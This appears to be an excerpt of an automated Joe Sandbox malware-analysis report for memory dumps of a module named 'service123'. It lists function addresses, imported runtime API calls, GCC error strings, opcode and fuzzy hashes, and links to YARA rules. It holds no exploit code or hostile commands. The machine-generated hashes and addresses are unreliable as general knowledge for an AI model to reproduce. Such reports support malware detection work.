abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 3755851c8625882211bccd23f9689df8b485de607fd116348449b821d215b828
Instruction ID: 49d196bbfe45751e9e197975491163f9dcf0fa547d3aac4c41367085f7e73051
Opcode Fuzzy Hash: 3755851c8625882211bccd23f9689df8b485de607fd116348449b821d215b828
Instruction Fuzzy Hash: 3241D1B1A112188FCB00DF68C8917E9BBF5BF49358F18866AEC58EF786D335D4418B51

Function 6C2CD370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2CCD00: strlen.MSVCRT ref: 6C2CCD7D

Sleep.KERNEL32 ref: 6C2CD4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: af6a5510527bae717759fd0618642caf7835318449c28a02c255cc9b7a12d9bb
Instruction ID: d078dbc38b2cdff9637987d57c300982c19dad661daae35495be4ab365ac50d1
Opcode Fuzzy Hash: af6a5510527bae717759fd0618642caf7835318449c28a02c255cc9b7a12d9bb
Instruction Fuzzy Hash: 2951EFA03083C5C9EFA1DB39C04A7867FF857DB308F04465ADA884B783D3BA5949C766

Function 6C2CD570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: c5a3343e0fe27c0fb43be3749936ef9092c681d2597a174bc7f965f096b57c7f
Instruction ID: 7e543a6d4a57f8d80da762995f7027d7b808aa02bd78847fe471009c1e8c0b14
Opcode Fuzzy Hash: c5a3343e0fe27c0fb43be3749936ef9092c681d2597a174bc7f965f096b57c7f
Instruction Fuzzy Hash: BE31D77074930A8FD3509F59E88076AB7E0EFC5318F148A2DE99897B01E335D444CF82

Function 6C2CD67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: dd3ca198e9bf5767b5d3544bc8295a6c17db61dc760f661d9addc73edae023c0
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: 04B01222DDA13CC344803BA404610B5B2385F1334C7027C40ED2733D010F20F4548C95

Function 6C2CD6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 28609eee0351ee7bedb1f8649823d4615f2651047401312014525c0e9555e950
Instruction ID: bcf9948359ce4b63b06bba67f808790972972b803745ac60b22ae3f9f8ccae31
Opcode Fuzzy Hash: 28609eee0351ee7bedb1f8649823d4615f2651047401312014525c0e9555e950
Instruction Fuzzy Hash: CB4157B0B4930A8FD350DF19C58075ABBE0EF89708F108A2EE998C7B51D375D8488B83

Function 6C2CD855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f113669efc3f1db98b154ab73ad8b8fde99ccf6141f2fb3ec93f7571ae8a8589
Instruction ID: 08f7617689032840b66083fd97192fa83638ff05f7936ae99b7ed8bb8bb10282
Opcode Fuzzy Hash: f113669efc3f1db98b154ab73ad8b8fde99ccf6141f2fb3ec93f7571ae8a8589
Instruction Fuzzy Hash: F1E0E571A4925B4BD340FE68D0803257BA06F8330CF041A8CD95227A42C334B84BCB82

Function 6C2DC330 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C2DC3A1
fwrite.MSVCRT ref: 6C2DC448
fputs.MSVCRT ref: 6C2DC465
fwrite.MSVCRT ref: 6C2DC48E
fputs.MSVCRT ref: 6C2DC4AD
fwrite.MSVCRT ref: 6C2DC4DC
fwrite.MSVCRT ref: 6C2DC50E
abort.MSVCRT ref: 6C2DC513
abort.MSVCRT ref: 6C396157
free.MSVCRT ref: 6C39615F

Part of subcall function 6C2CA340: strlen.MSVCRT ref: 6C2CA3C5
Part of subcall function 6C2CA340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C2DC41C), ref: 6C2CA3E0
Part of subcall function 6C2CA340: free.MSVCRT ref: 6C2CA3EA

Strings

not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C2DC349
terminate called without an active exception, xrefs: 6C2DC4D5
-, xrefs: 6C2DC4C1
terminate called after throwing an instance of ', xrefs: 6C2DC441

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: aa54d3087890aca95894a59b7417ad4461e9d52176b93b2455bba1e4080f757b
Instruction ID: 975f79dac2bcbb63fcc84b98e64f7f620253cbbd9f4e83da4dc932295c404064
Opcode Fuzzy Hash: aa54d3087890aca95894a59b7417ad4461e9d52176b93b2455bba1e4080f757b
Instruction Fuzzy Hash: 455135B19083189FD700AF64C48979ABBF4AF85308F01895DE8D987741EBB99489CF93

Function 6C2CD8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: e94dc4e826c03191163278fdd366d86424283213f9e51def64ca94ee6649a638
Instruction ID: d65b42638a2a5951b8d1f00ef8998356daddf44bb6b413fd253e7f5f0e589ee0
Opcode Fuzzy Hash: e94dc4e826c03191163278fdd366d86424283213f9e51def64ca94ee6649a638
Instruction Fuzzy Hash: A3F089B1A6535A4FD3509F1894817657BA07B83319F480984EC541B752D339A499CBD1

Function 6C2CDE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C2CDEB8

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 090283ef67773d96e28e6b21c0c4144f2e02146b9beeb2bdd985cab86034bbef
Instruction ID: a7f4ef9a07f0b86fdbfee42117856eae6ae2cdae97da2d8217de6650c5e2b3c8
Opcode Fuzzy Hash: 090283ef67773d96e28e6b21c0c4144f2e02146b9beeb2bdd985cab86034bbef
Instruction Fuzzy Hash: 8021D87174125ECBDB90DF54CC80BDDB7B4AB86319F1046A6DD18AB710EB309E888F81

Function 6C2CDA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 75dc925cd3fab869317989df507a8ef4a8d28f2712aaf00d04d894b84e91a3c1
Instruction ID: 1955d8936ea492f72cb97a27cdfb22fb96d21fe5b852df885f03933f0787cc03
Opcode Fuzzy Hash: 75dc925cd3fab869317989df507a8ef4a8d28f2712aaf00d04d894b84e91a3c1
Instruction Fuzzy Hash: 08413C75A0421D9BCB50DF55C880BDEB7B1AF89318F1486A9EC09B7700DB30AE89CF91

Function 6C2CDCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 8dd8a6de4328ac6d55125594143ccfc441bad2948c2cbe46bffd9a3a31ed78b6
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: 42116075A4022C9BCB54EF64C8909DEB7B5AF85358F05CAA4EC0967B00DB30AE49CFD1

Function 6C2CDD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction ID: c63398c50237e4e5a4d9b65fc061c77f4494799236802f4b07c9731e73210006
Opcode Fuzzy Hash: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction Fuzzy Hash: 97210875A0021D9BCF50DF60C8809DEB7B5AF85308F1189A8DC0977741DB30AE49CF91

Function 6C2D0310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C39395F), ref: 6C2D034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C39395F), ref: 6C2D0352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C39395F), ref: 6C2D0360

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
